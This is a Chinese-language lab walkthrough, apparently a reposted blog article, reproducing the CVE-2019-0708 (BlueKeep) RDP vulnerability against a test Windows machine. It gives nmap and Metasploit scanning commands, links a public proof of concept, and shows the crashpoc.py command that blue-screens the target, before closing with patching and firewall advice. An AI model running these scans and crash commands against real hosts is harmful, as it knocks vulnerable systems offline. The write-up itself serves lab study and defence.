首页 安全文摘 漏洞分析 正文

CVE-2019-0708_RDP漏洞利用

漏洞简介:基于Windows系列服务器系列漏洞,在2019年5月15日被公开,级别属于高危漏洞,利用方式简单,通过3389端口,RDP协议进行攻击。这个漏洞是今年危害严重性最大的漏洞受影响的操作系统有:windows2003、windows2008、windows2008 R2、windows xp 、windows7环境搭建:靶机:Windows_seve

漏洞简介:

基于Windows系列服务器系列漏洞,在2019年5月15日被公开,级别属于高危漏洞,利用方式简单,通过3389端口,RDP协议进行攻击。这个漏洞是今年危害严重性最大的漏洞

受影响的操作系统有:windows2003、windows2008、windows2008 R2、windows xp 、windows7


环境搭建:

靶机:Windows_sever_2012,IP :192.168.231.130

CVE 2019 0708 RDP漏洞利用  漏洞分析  第1张

渗透机:Windows10,IP :192.168.231.2,有python3.x环境.

CVE 2019 0708 RDP漏洞利用  漏洞分析  第2张

工具:360_RDP漏洞扫描工具(解压密码:qx)

POC:https://github.com/n1xbyte/CVE-2019-0708


漏洞复现:

1. nmap扫描3389端口是否开放

CVE 2019 0708 RDP漏洞利用  漏洞分析  第3张

2.漏洞扫描

CVE 2019 0708 RDP漏洞利用  漏洞分析  第4张

    可以看见直接爆了漏洞

  • 同样的,也可以使用msf进行扫描

msf5 > search 0708    #查找是否有 CVE-2019-0708模块如果没有,则需要更新
apt-get install Metasploit-framework #更新msf模块
msf5 > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep  #利用漏洞扫描模块
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > show options  #查看参数
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts 192.168.231.143 #设置靶机IP
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run  #运行

CVE 2019 0708 RDP漏洞利用  漏洞分析  第5张

一样的,直接爆


漏洞利用:

先安装或者升级pip3(如果以前安装了,就直接安装impacket库),再安装impacket库

python -m pip install -U pip

我的已经更新过了.

CVE 2019 0708 RDP漏洞利用  漏洞分析  第6张

安装impacket库

pip3 install impacket

CVE 2019 0708 RDP漏洞利用  漏洞分析  第7张

2. 下载CVE-2019-0708,并进入该目录

CVE 2019 0708 RDP漏洞利用  漏洞分析  第8张

3. 最后,就是攻击了.

python crashpoc.py 192.168.231.130 64  #python crashpoc.py ip地址 系统类型

CVE 2019 0708 RDP漏洞利用  漏洞分析  第9张

在发动攻击的瞬间,靶机蓝屏了.这个东西,威力挺大的


写在最后:

这个漏洞能做的事情,远远没有重启这么简单,建议:

  1. 关闭3389端口或添加防火墙安全策略限制对3389端口的访问

  2. 及时打对应系统的安全补丁

本文转载自互联网,如有侵权,联系删除

转载请注明本文地址:https://heibai.org.cn/1568.html

相关推荐

看起来这里没有任何东西...

发布评论

ainiaobaibaibaibaobaobeishangbishibizuichiguachijingchongjingdahaqiandaliandangaodw_dogedw_erhadw_miaodw_tuzidw_xiongmaodw_zhutouganbeigeiliguiguolaiguzhanghahahahashoushihaixiuhanheixianhenghorse2huaixiaohuatonghuaxinhufenjiayoujiyankeaikeliankouzhaokukuloukunkuxiaolandelinileimuliwulxhainiolxhlikelxhqiuguanzhulxhtouxiaolxhwahahalxhzanningwennonuokpinganqianqiaoqinqinquantouruoshayanshengbingshiwangshuaishuijiaosikaostar0star2star3taikaixintanshoutianpingtouxiaotuwabiweifengweiquweiwuweixiaowenhaowoshouwuxiangjixianhuaxiaoerbuyuxiaokuxiaoxinxinxinxinsuixixixuyeyinxianyinyueyouhenghengyuebingyueliangyunzanzhajizhongguozanzhoumazhuakuangzuohenghengzuoyi
感谢您的支持